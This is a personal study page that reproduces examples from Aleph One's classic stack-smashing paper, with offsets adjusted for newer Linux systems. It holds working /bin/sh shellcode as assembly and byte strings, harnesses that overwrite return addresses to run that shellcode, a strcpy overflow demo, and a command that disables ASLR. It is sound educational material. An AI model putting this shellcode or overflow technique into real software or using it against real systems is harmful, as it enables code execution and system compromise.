Jithesh Kuyyalil

Notes on smashing the stack by Aleph One;

For example 3 in Aleph One's Smashing the Stack for Fun and Profit paper, the offset values in the following code didn't work on my Kali linux 2025.2 system. I couldn't get it to jump beyond x = 1; assignment.


        ret = buffer1 + 12; 
        (*ret) += 8;
    

Below is the working piece of code which worked on both the Kali 2025.2 and ubuntu 10.04 which was compiled as below and I disabled address space randomization.


        gcc -o out example3_bof_alphone.c -ggdb -m32
        echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
    

The following piece of code with the offsets of 13, 8 worked on both systems.


        #include
        
        void function(int a, int b, int c) {
            char buffer1[5];
            char buffer2[10];
            int *ret;
        
            ret = (int *)(buffer1 + 13);
            (*ret) += 8;
        
            }
        
        int main() {
            int x;
            x = 0;
            function(1,2,3);
            x = 1;
            printf("%d\n", x);
        }

    

For shellcodeasm.c the following formatting helped to get it working;


	void main(){

	__asm__(
	"jmp jmp_here\n\t"
	"call_here:\n\t"
	"popl %esi\n\t"
	"movl %esi,0x8(%esi)\n\t"
	"movb $0x0,0x7(%esi)\n\t"
	"movl $0x0,0xc(%esi)\n\t"
	"movl $0xb,%eax\n\t"
	"movl %esi,%ebx\n\t"
	"leal 0x8(%esi),%ecx\n\t"
	"leal 0xc(%esi),%edx\n\t"
	"int $0x80\n\t"
	"movl $0x1, %eax\n\t"
	"movl $0x0, %ebx\n\t"
	"int $0x80\n\t"
	"jmp_here:\n\t"
	"call call_here\n\t"
	".string \"/bin/sh\"\n\t");
	}

    

We have the following code testsc.c, which runs well on ubuntu 10.04.


	char shellcode[] =

	"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5d\xc3";

	int main(){
		int * ret;
		ret = (int *)&ret + 2;
		(*ret) = (int)shellcode;
	}

    

The following worked for shellcodeasm2.c.


    int main(){

	__asm__(
	"jmp before_call\n\t"
	"before_pop:\n\t"
	"popl %esi\n\t"
	"movl %esi,0x8(%esi)\n\t"
	"xorl %eax,%eax\n\t"
	"movb %eax,0x7(%esi)\n\t"
	"movl %eax,0xc(%esi)\n\t"
	"movb $0xb,%al\n\t"
	"movl %esi,%ebx\n\t"
	"leal 0x8(%esi),%ecx\n\t"
	"leal 0xc(%esi),%edx\n\t"
	"int $0x80\n\t"
	"xorl %ebx,%ebx\n\t"
	"movl %ebx,%eax\n\t"
	"inc %eax\n\t"
	"int $0x80\n\t"
	"before_call:\n\t"
	"call before_pop\n\t"
	".string \"/bin/sh\"\n\t"
	);
	}
    

Belows is the working piece of code for testsc2.c.


   	 char shellcode[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x4d\xc3";

	int main(){

		int *ret;

		ret = (int *)&ret + 2;
		(*ret) = (int)shellcode;
	}
    

I had to increase the large_string array size for the RET to be overwritten as shown below.


    	#include
	char shellcode[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

	char large_string[136];

	int main(){

		 char buffer[96];
		 int i;

		 long * long_ptr = (long *) large_string;

		 for (i=0; i<34; i++)
			 *(long_ptr + i) = (int) buffer;

		 for (i=0; i < strlen(shellcode); i++)
			 large_string[i] = shellcode[i];

		 strcpy(buffer, large_string);

	}

    

Contact Me: jithesh82 AT G mail